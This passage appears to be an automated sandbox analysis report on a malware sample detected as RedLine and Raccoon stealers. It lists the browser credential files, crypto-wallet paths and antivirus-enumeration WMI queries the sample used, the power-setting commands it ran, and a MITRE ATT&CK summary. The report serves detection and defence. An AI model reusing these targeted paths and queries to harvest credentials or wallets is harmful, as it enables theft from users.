Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\N2wufLmC74.exe

Code function: 0_2_01451810 cpuid

0_2_01451810

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF715BA7430 GetSystemTimeAsFileTime,

14_2_00007FF715BA7430

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.3.N2wufLmC74.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.N2wufLmC74.exe.14817a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.N2wufLmC74.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.240125643.0000000000A02000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: N2wufLmC74.exe PID: 6060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2416, type: MEMORYSTR

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 39.2.zonewar.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.zonewar.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.zonewar.exe.c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.zonewar.exe.c277a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.356932186.0000000000C28000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.355141479.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5316, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: vbc.exe, 00000035.00000002.459433113.0000000000D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\*
Source: vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: k1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: k5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 00000024.00000003.443392010.00000227812FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $IsAutoUnlockKeyStoredResult = Invoke-CimMethod -InputObject $Win32EncryptableVolume -MethodName IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\

Source: Yara match	File source: 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.458015217.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2416, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.3.N2wufLmC74.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.N2wufLmC74.exe.14817a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.N2wufLmC74.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.240125643.0000000000A02000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: N2wufLmC74.exe PID: 6060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2416, type: MEMORYSTR

Yara detected Raccoon Stealer v2

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 39.2.zonewar.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.zonewar.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.zonewar.exe.c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.zonewar.exe.c277a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.356932186.0000000000C28000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.355141479.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5316, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	2 DLL Side-Loading	2 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Native API	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	711 Process Injection	31 Obfuscated Files or Information	Security Account Manager	134 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Command and Scripting Interpreter	Logon Script (Mac)	1 Scheduled Task/Job	1 Software Packing	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	11 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Service Execution	Rc.common	Rc.common	2 DLL Side-Loading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
